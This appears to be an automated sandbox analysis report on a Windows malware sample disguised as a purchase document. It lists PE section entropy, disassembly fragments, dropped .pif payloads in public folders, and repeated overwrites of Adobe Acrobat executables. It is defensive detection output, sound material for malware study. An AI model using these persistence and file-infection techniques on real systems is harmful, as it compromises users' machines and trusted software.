                  Source: elevation_service.exe.9.drStatic PE information: section name: .00cfg
                  Source: elevation_service.exe.9.drStatic PE information: section name: .gxfg
                  Source: elevation_service.exe.9.drStatic PE information: section name: .retplne
                  Source: elevation_service.exe.9.drStatic PE information: section name: _RDATA
                  Source: elevation_service.exe.9.drStatic PE information: section name: malloc_h
                  Source: elevation_service.exe0.9.drStatic PE information: section name: .00cfg
                  Source: elevation_service.exe0.9.drStatic PE information: section name: .gxfg
                  Source: elevation_service.exe0.9.drStatic PE information: section name: .retplne
                  Source: elevation_service.exe0.9.drStatic PE information: section name: _RDATA
                  Source: elevation_service.exe0.9.drStatic PE information: section name: malloc_h
                  Source: maintenanceservice.exe0.9.drStatic PE information: section name: .00cfg
                  Source: maintenanceservice.exe0.9.drStatic PE information: section name: .voltbl
                  Source: maintenanceservice.exe0.9.drStatic PE information: section name: _RDATA
                  Source: msdtc.exe.9.drStatic PE information: section name: .didat
                  Source: msiexec.exe.9.drStatic PE information: section name: .didat
                  Source: MsSense.exe.9.drStatic PE information: section name: .didat
                  Source: unpack200.exe.9.drStatic PE information: section name: .00cfg
                  Source: Spectrum.exe.9.drStatic PE information: section name: .didat
                  Source: TieringEngineService.exe.9.drStatic PE information: section name: .didat
                  Source: vds.exe.9.drStatic PE information: section name: .didat
                  Source: VSSVC.exe.9.drStatic PE information: section name: .didat
                  Source: WmiApSrv.exe.9.drStatic PE information: section name: .didat
                  Source: wmpnetwk.exe.9.drStatic PE information: section name: .didat
                  Source: ie_to_edge_stub.exe.9.drStatic PE information: section name: .00cfg
                  Source: ie_to_edge_stub.exe.9.drStatic PE information: section name: .gxfg
                  Source: ie_to_edge_stub.exe.9.drStatic PE information: section name: .retplne
                  Source: ie_to_edge_stub.exe.9.drStatic PE information: section name: _RDATA
                  Source: cookie_exporter.exe.9.drStatic PE information: section name: .00cfg
                  Source: cookie_exporter.exe.9.drStatic PE information: section name: .gxfg
                  Source: cookie_exporter.exe.9.drStatic PE information: section name: .retplne
                  Source: cookie_exporter.exe.9.drStatic PE information: section name: _RDATA
                  Source: identity_helper.exe.9.drStatic PE information: section name: .00cfg
                  Source: identity_helper.exe.9.drStatic PE information: section name: .gxfg
                  Source: identity_helper.exe.9.drStatic PE information: section name: .retplne
                  Source: identity_helper.exe.9.drStatic PE information: section name: _RDATA
                  Source: identity_helper.exe.9.drStatic PE information: section name: malloc_h
                  Source: setup.exe0.9.drStatic PE information: section name: .00cfg
                  Source: setup.exe0.9.drStatic PE information: section name: .gxfg
                  Source: setup.exe0.9.drStatic PE information: section name: .retplne
                  Source: setup.exe0.9.drStatic PE information: section name: LZMADEC
                  Source: setup.exe0.9.drStatic PE information: section name: _RDATA
                  Source: setup.exe0.9.drStatic PE information: section name: malloc_h
                  Source: msedgewebview2.exe.9.drStatic PE information: section name: .00cfg
                  Source: msedgewebview2.exe.9.drStatic PE information: section name: .gxfg
                  Source: msedgewebview2.exe.9.drStatic PE information: section name: .retplne
                  Source: msedgewebview2.exe.9.drStatic PE information: section name: CPADinfo
                  Source: msedgewebview2.exe.9.drStatic PE information: section name: LZMADEC
                  Source: msedgewebview2.exe.9.drStatic PE information: section name: _RDATA
                  Source: msedgewebview2.exe.9.drStatic PE information: section name: malloc_h
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B3D2FC push 02B3D367h; ret 0_2_02B3D35F
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B163B0 push 02B1640Bh; ret 0_2_02B16403
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B163AE push 02B1640Bh; ret 0_2_02B16403
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B1332C push eax; ret 0_2_02B13368
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B3C378 push 02B3C56Eh; ret 0_2_02B3C566
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B1C349 push 8B02B1C1h; ret 0_2_02B1C34E
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B3D0AC push 02B3D125h; ret 0_2_02B3D11D
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B2306B push 02B230B9h; ret 0_2_02B230B1
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B2306C push 02B230B9h; ret 0_2_02B230B1
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B3D1F8 push 02B3D288h; ret 0_2_02B3D280
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B2F108 push ecx; mov dword ptr [esp], edx0_2_02B2F10D
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B3D144 push 02B3D1ECh; ret 0_2_02B3D1E4
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B16782 push 02B167C6h; ret 0_2_02B167BE
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B16784 push 02B167C6h; ret 0_2_02B167BE
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B1D5A0 push 02B1D5CCh; ret 0_2_02B1D5C4
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B3C570 push 02B3C56Eh; ret 0_2_02B3C566
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B1C56C push ecx; mov dword ptr [esp], edx0_2_02B1C571
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B2AAE0 push 02B2AB18h; ret 0_2_02B2AB10
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B28AD8 push 02B28B10h; ret 0_2_02B28B08
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B2AADF push 02B2AB18h; ret 0_2_02B2AB10
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B1CA4E push 02B1CD72h; ret 0_2_02B1CD6A
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B1CBEC push 02B1CD72h; ret 0_2_02B1CD6A
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B2886C push 02B288AEh; ret 0_2_02B288A6
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B84850 push eax; ret 0_2_02B84920
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B2790C push 02B27989h; ret 0_2_02B27981
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B26946 push 02B269F3h; ret 0_2_02B269EB
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B26948 push 02B269F3h; ret 0_2_02B269EB
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B25E7C push ecx; mov dword ptr [esp], edx0_2_02B25E7E
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B22F60 push 02B22FD6h; ret 0_2_02B22FCE
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifCode function: 9_1_00423149 push eax; ret 9_1_00423179
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifCode function: 9_1_004231C8 push eax; ret 9_1_00423179
                  Source: OfficeC2RClient.exe.9.drStatic PE information: section name: .reloc entropy: 7.716531641683351
                  Source: AutoIt3_x64.exe.9.drStatic PE information: section name: .reloc entropy: 7.943923715486162
                  Source: SciTE.exe.9.drStatic PE information: section name: .reloc entropy: 7.912306761260712
                  Source: jucheck.exe.9.drStatic PE information: section name: .reloc entropy: 7.931066535936268
                  Source: jusched.exe.9.drStatic PE information: section name: .reloc entropy: 7.9360449857967845
                  Source: officesvcmgr.exe.9.drStatic PE information: section name: .reloc entropy: 7.937214975696088
                  Source: chrome_pwa_launcher.exe.9.drStatic PE information: section name: .reloc entropy: 7.940578250020388
                  Source: chrmstp.exe.9.drStatic PE information: section name: .reloc entropy: 7.941007655078489
                  Source: setup.exe.9.drStatic PE information: section name: .reloc entropy: 7.941016483532946
                  Source: notification_helper.exe.9.drStatic PE information: section name: .reloc entropy: 7.941922342165591
                  Source: chrome_proxy.exe.9.drStatic PE information: section name: .reloc entropy: 7.939822159897867
                  Source: default-browser-agent.exe.9.drStatic PE information: section name: .reloc entropy: 7.941521323195514
                  Source: firefox.exe.9.drStatic PE information: section name: .reloc entropy: 7.938877607948963
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.9.drStatic PE information: section name: .reloc entropy: 7.934758045410535
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.9.drStatic PE information: section name: .reloc entropy: 7.9347595380157845
                  Source: AppVClient.exe.9.drStatic PE information: section name: .reloc entropy: 7.936511892174674
                  Source: FXSSVC.exe.9.drStatic PE information: section name: .reloc entropy: 7.9422618484251535
                  Source: elevation_service.exe.9.drStatic PE information: section name: .reloc entropy: 7.9439487512723215
                  Source: elevation_service.exe0.9.drStatic PE information: section name: .reloc entropy: 7.9459521432086095
                  Source: SensorDataService.exe.9.drStatic PE information: section name: .reloc entropy: 7.9353733378156495
                  Source: Spectrum.exe.9.drStatic PE information: section name: .reloc entropy: 7.945441823870061
                  Source: AgentService.exe.9.drStatic PE information: section name: .reloc entropy: 7.9371088687797275
                  Source: vds.exe.9.drStatic PE information: section name: .reloc entropy: 7.941063416564255
                  Source: VSSVC.exe.9.drStatic PE information: section name: .reloc entropy: 7.939522654308565
                  Source: wbengine.exe.9.drStatic PE information: section name: .reloc entropy: 7.941271109507692
                  Source: wmpnetwk.exe.9.drStatic PE information: section name: .reloc entropy: 7.946597973181
                  Source: identity_helper.exe.9.drStatic PE information: section name: .reloc entropy: 7.929614491235706
                  Source: setup.exe0.9.drStatic PE information: section name: .reloc entropy: 7.933869100083904
                  Source: msedgewebview2.exe.9.drStatic PE information: section name: .reloc entropy: 7.925314997991553

                  Persistence and Installation Behavior

                  barindex
                  Creates files in the system32 config directory
                  Source: C:\Windows\System32\alg.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\3f155f6931e417df.bin
                  Drops PE files with a suspicious file extension
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeFile created: C:\Users\Public\Libraries\ymafvvdS.pifJump to dropped file
                  Drops executable to a common third party application directory
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
